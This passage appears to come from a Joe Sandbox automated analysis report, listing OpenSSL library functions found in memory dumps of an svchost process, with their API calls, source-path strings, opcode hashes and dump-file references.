                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_zalloc$CriticalInitializeO_freeO_mallocSection_beginthreadex
                                                                                              • String ID: crypto\thread\arch.c
                                                                                              • API String ID: 4205757297-147645559
                                                                                              • Opcode ID: 1df285d3367c84bec90169404a8c602494a54b31cedb8312a4a4952bdaf28ccb
                                                                                              • Instruction ID: 968123061d8882feabf3f7c79e4d1e5c04664ceb159d325e3918443905709cad
                                                                                              • Opcode Fuzzy Hash: 1df285d3367c84bec90169404a8c602494a54b31cedb8312a4a4952bdaf28ccb
                                                                                              • Instruction Fuzzy Hash: B021BDA1E1BB4281EB56DF31E44206D22A4FF44B84F449436EE6D87BAAEF3CE500C710
                                                                                              Function 00007FFBAB464800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OPENSSL_LH_delete.LIBCRYPTO-3-X64(?,00007FFBAB458312,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB4648B4
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB458312,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB4648C9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_deleteO_free
                                                                                              • String ID: ssl\quic\quic_stream_map.c
                                                                                              • API String ID: 2213166339-1155244460
                                                                                              • Opcode ID: 209cd0de2672983f8be90e1961f2fb088ae3ed1ac36a604aeebd1813528bc227
                                                                                              • Instruction ID: 992d5c386f52fb86c96d74de638c49db357e4a60c14cbff2955eb6882fc44616
                                                                                              • Opcode Fuzzy Hash: 209cd0de2672983f8be90e1961f2fb088ae3ed1ac36a604aeebd1813528bc227
                                                                                              • Instruction Fuzzy Hash: 1021E4B6A16F5481EB55CF3AE49012C73B8F748F98B148126EE5C47769DF38C8A2C380
                                                                                              Function 00007FFBAB460130 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB460164
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000,?,?,?,00007FFBAB45358D), ref: 00007FFBAB4601A3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_zalloc
                                                                                              • String ID: ssl\quic\quic_rstream.c
                                                                                              • API String ID: 2237658545-3266392800
                                                                                              • Opcode ID: e761e806749da03bf56e2e36b210a9b0d9d62d323b370c1c01d566d46031b2fc
                                                                                              • Instruction ID: 6b9ccee34d3e911062b7d1b132941acc900906400c9337462bbb6df9a75a6538
                                                                                              • Opcode Fuzzy Hash: e761e806749da03bf56e2e36b210a9b0d9d62d323b370c1c01d566d46031b2fc
                                                                                              • Instruction Fuzzy Hash: 3411C272626B1285EA41DB29E8901AD77A4FB44B84F548439EE9C43766EF3CD552C700
                                                                                              Function 00007FFBAB412A80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: crypto\thread\arch.c
                                                                                              • API String ID: 0-147645559
                                                                                              • Opcode ID: a0f20e0b3109180acf445ad273c8bb40febf88ff112b646f11ec94fc715c45f9
                                                                                              • Instruction ID: b6aa29e14faba1862e6d8eb3ba55dd685f7a5d53bedbe3b68e456ef268bf7da1
                                                                                              • Opcode Fuzzy Hash: a0f20e0b3109180acf445ad273c8bb40febf88ff112b646f11ec94fc715c45f9
                                                                                              • Instruction Fuzzy Hash: D70184E1F2A55282EF52EB72E4822B91354FF85B84F449032ED2D872A6DF1CD5928710
                                                                                              Function 00007FFBAB488B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_memdup
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h
                                                                                              • API String ID: 3962629258-3519961458
                                                                                              • Opcode ID: a728c59dc59ea8002b74f92822e2773b4a6ad8d6a9b46d238b29f504cf8f8bc1
                                                                                              • Instruction ID: f4a329ec23efb70ced967bb6b9b4adc3ac9f63a8405488b1e79d7098d81269dc
                                                                                              • Opcode Fuzzy Hash: a728c59dc59ea8002b74f92822e2773b4a6ad8d6a9b46d238b29f504cf8f8bc1
                                                                                              • Instruction Fuzzy Hash: 3C012CB2707B5281EB51DF22E8806596764FB98BC0F088435EE9C47B69DE3CD5618700
                                                                                              Function 00007FFBAB46EED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_malloc
                                                                                              • String ID: ssl\record\rec_layer_d1.c
                                                                                              • API String ID: 2609694610-2186836241
                                                                                              • Opcode ID: 19350aefcc9e48473532e3a56b95fd137591b1c14b86f31f68a35ff9e07a6a0b
                                                                                              • Instruction ID: ce2f9ec12a5577cbfda81853401b9f79f78e6f432cb3dceb3e0801a0c3bec66b
                                                                                              • Opcode Fuzzy Hash: 19350aefcc9e48473532e3a56b95fd137591b1c14b86f31f68a35ff9e07a6a0b
                                                                                              • Instruction Fuzzy Hash: 490181B2B1B74292EA56DB25E4853AC7390FF44B44F88C435EF6C477A6EE78E4588700
                                                                                              Function 00007FFBAB446B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB447040: BIO_ctrl.LIBCRYPTO-3-X64(00000000,00007FFBAB446B57,00000000,00007FFBAB447D75,?,00000000,?,?,02000100,00007FFBAB44C1EB,02000100,00007FFBAB44E4DA,?,00007FFBAB450F14), ref: 00007FFBAB4470B3
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(00000000,00007FFBAB447D75,?,00000000,?,?,02000100,00007FFBAB44C1EB,02000100,00007FFBAB44E4DA,?,00007FFBAB450F14), ref: 00007FFBAB446B6A
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(00000000,00007FFBAB447D75,?,00000000,?,?,02000100,00007FFBAB44C1EB,02000100,00007FFBAB44E4DA,?,00007FFBAB450F14), ref: 00007FFBAB446B93
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_ctrl
                                                                                              • String ID: ssl\quic\json_enc.c
                                                                                              • API String ID: 1134426049-3790216822
                                                                                              • Opcode ID: e9ede09c86302a8fa937d5da6f7ae62213afd64565b9edc0a6eb65effc076c5c
                                                                                              • Instruction ID: 058a7db2fd8356063e0f6e13d30a839b6ed7d60a84f0b165cd59fc53228fa393
                                                                                              • Opcode Fuzzy Hash: e9ede09c86302a8fa937d5da6f7ae62213afd64565b9edc0a6eb65effc076c5c
                                                                                              • Instruction Fuzzy Hash: 2601ADB2A1666182EB51CF31E89016C7368EB80B84F449532EE5C47B6ACE3CD992C740
                                                                                              Function 00007FFBAB460770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_clear_free.LIBCRYPTO-3-X64(?,00007FFBAB4609B9,?,?,00000000,00007FFBAB460191,?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000), ref: 00007FFBAB460798
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB4609B9,?,?,00000000,00007FFBAB460191,?,00007FFBAB44C984,00000000,?,?,00007FFBAB4501BA,00000000,00007FFBAB458275,?,00000000), ref: 00007FFBAB4607B9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_freeO_free
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/ring_buf.h
                                                                                              • API String ID: 589068787-3109175187
                                                                                              • Opcode ID: 88fc3910a59db1d4f0bbec0069283dcebb86222718afef598986d2a39b1b1346
                                                                                              • Instruction ID: 637861863fb8f9430ebefdc58bf66cffe45c8fa535d418739adc90e0c66f0e19
                                                                                              • Opcode Fuzzy Hash: 88fc3910a59db1d4f0bbec0069283dcebb86222718afef598986d2a39b1b1346
                                                                                              • Instruction Fuzzy Hash: 39F082B2A56A0285E7529F79E88126C33E5EB44B44F48C034CA1C87365EE3CD595C340
                                                                                              Function 00007FFBAB412860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeO_zallocSection
                                                                                              • String ID: crypto\thread\arch\thread_win.c
                                                                                              • API String ID: 3172406216-2915021490
                                                                                              • Opcode ID: 55c8b90a7566c8f3e0aefc499b230187a0ef79df52c9709b3d3d54b890a3517c
                                                                                              • Instruction ID: 59b603731083eacf8b058663e080beae72f7a50082dc3c8aec9588c279ae543d
                                                                                              • Opcode Fuzzy Hash: 55c8b90a7566c8f3e0aefc499b230187a0ef79df52c9709b3d3d54b890a3517c
                                                                                              • Instruction Fuzzy Hash: 96E086E1E4721382ED169736E8516B81660DF54745F48C034CD1D07361FE2CF5969700
                                                                                              Function 00007FFBAB4127F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalDeleteO_freeSection
                                                                                              • String ID: crypto\thread\arch\thread_win.c
                                                                                              • API String ID: 3175850418-2915021490
                                                                                              • Opcode ID: 2ac0e5579664708379d0deb40121636555b8a02c42a100e7b550d23506ca5284
                                                                                              • Instruction ID: 8700781ecc6583a1a863d33fe3553064403c787684559e10658fedc021d5934b
                                                                                              • Opcode Fuzzy Hash: 2ac0e5579664708379d0deb40121636555b8a02c42a100e7b550d23506ca5284
                                                                                              • Instruction Fuzzy Hash: F1E08CE5F0B60285FF129BB2E8913382220AF48B85F04C531DD1D833A2CF2C90448301
                                                                                              Function 64946F50 Relevance: 4.5, APIs: 3, Instructions: 43timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemTimeAdjustment.KERNEL32 ref: 64946F72
                                                                                              • _errno.MSVCRT ref: 64946F95
                                                                                              • QueryPerformanceFrequency.KERNEL32 ref: 64946FB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustmentFrequencyPerformanceQuerySystemTime_errno
                                                                                              • String ID:
                                                                                              • API String ID: 931094001-0
                                                                                              • Opcode ID: 9c9b8dc8953adad8b182c48c2c5c1b28200ee0171dd9cfc96682e4bc88c00d4e
                                                                                              • Instruction ID: 19e011e90420178d8d56a0d731f9381e34ba0287a3f741502673f42520627ade
                                                                                              • Opcode Fuzzy Hash: 9c9b8dc8953adad8b182c48c2c5c1b28200ee0171dd9cfc96682e4bc88c00d4e
                                                                                              • Instruction Fuzzy Hash: 2E01F7B2690B4196FB05CF31D81035AB3A4FB85B58F04A155DA9A8A394FB3DC956CB20
                                                                                              Function 00007FFBAB46A1D0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 156COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\quic\quic_txp.c
                                                                                              • API String ID: 3931833713-3700743932
                                                                                              • Opcode ID: 3a9f533066588ae01ffe6f7c752876e93640bc5ae2fa97fe630ced6ad063d1b3
                                                                                              • Instruction ID: 25924289449a00a73b8657d07c064558f681244041b9240f560ee13f853b78d5
                                                                                              • Opcode Fuzzy Hash: 3a9f533066588ae01ffe6f7c752876e93640bc5ae2fa97fe630ced6ad063d1b3
                                                                                              • Instruction Fuzzy Hash: 1E61BEB2A0ABD18AD3518F39E8503A977A0F704B48F048239EF6D47759CF39D9A5E700
                                                                                              Function 00007FFBAB45CFF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(?,00000031,?,00007FFBAB45CC96,00000000,?,00000000,?,?,00000000,00000000,00007FFBAB45C5FE,?,?,00000000), ref: 00007FFBAB45D0AB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\quic\quic_record_rx.c
                                                                                              • API String ID: 3931833713-3047069087
                                                                                              • Opcode ID: 8dfeef587841a2842ec8d2d83fc4e3ee92f45fde34ad19d3e0c8842bd999a5a3
                                                                                              • Instruction ID: e97e0efa6f9b3ceaf49118e135189525c14c6f8c258f104bac3b7ee16e94c389
                                                                                              • Opcode Fuzzy Hash: 8dfeef587841a2842ec8d2d83fc4e3ee92f45fde34ad19d3e0c8842bd999a5a3
                                                                                              • Instruction Fuzzy Hash: 8E5105B2606F4585EB658F29E440B2873A4FB08F98F248635DE6D47B64DF39D8A2C310
                                                                                              Function 00007FFBAB482930 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(?,00000000,?,00007FFBAB466088,?,00007FFBAB44F4D2,?,00007FFBAB450F40), ref: 00007FFBAB482A51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\statem\extensions_cust.c
                                                                                              • API String ID: 3931833713-1564674317
                                                                                              • Opcode ID: 7101a2e13ea020165fa1c196afcf608869ea0189fd230748d22ea18b9225f158
                                                                                              • Instruction ID: 234b64e1bc435fa55b6687e5f7a4336b6180fd0613f6e6dd74adbbea103bac3d
                                                                                              • Opcode Fuzzy Hash: 7101a2e13ea020165fa1c196afcf608869ea0189fd230748d22ea18b9225f158
                                                                                              • Instruction Fuzzy Hash: A14192B2B0AB8582E6668B69D480229B7E0FF58B94F54C231DEAD437B4DF39D491C740
                                                                                              Function 00007FFBAB481C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(?,00000000,?,00007FFBAB431EBC,?,?,?,00007FFBAB4310C3,00000004,00007FFBAB4314E5), ref: 00007FFBAB481D61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_realloc
                                                                                              • String ID: ssl\statem\extensions_cust.c
                                                                                              • API String ID: 3931833713-1564674317
                                                                                              • Opcode ID: f93c4a65a06351fae531afe635b86c9a61260678098dafe52465267355e0f59a
                                                                                              • Instruction ID: fa8e0fbe851e54320b3ef92cc70f07376ed623b6321e08ae3e083be0ec9a33d5
                                                                                              • Opcode Fuzzy Hash: f93c4a65a06351fae531afe635b86c9a61260678098dafe52465267355e0f59a
                                                                                              • Instruction Fuzzy Hash: F231C4B2B0A78285EA658F6AE44017DA7E1FB4CB90F548536DE6C437B0DE3DE8429340
                                                                                              Function 00007FFBAB46EB20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(00000000,00007FFBAB44B13A,?,00007FFBAB44A99E), ref: 00007FFBAB46EBE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free
                                                                                              • String ID: ssl\quic\uint_set.c
                                                                                              • API String ID: 2581946324-544055092
                                                                                              • Opcode ID: 037bcce4723b1bd283e8492134f75402ea85b534f365039734be5e050b1f4636
                                                                                              • Instruction ID: 4b12231cfdeb9f76c23056c0ab27ad9e78c98d1a9bcf3b137ddb5208644e4845
                                                                                              • Opcode Fuzzy Hash: 037bcce4723b1bd283e8492134f75402ea85b534f365039734be5e050b1f4636
                                                                                              • Instruction Fuzzy Hash: F9412C72A4AB4585DB55DF25E09022873A4FB54F84F58C436EF6D47B68EF39E8A1C300
                                                                                              Function 00007FFBAB46A940 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB468BFF,?,?,00000004,?,?,00000004,00007FFBAB467831,?,?,?,?,?,?,00007FFBAB44F81E), ref: 00007FFBAB46A96F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
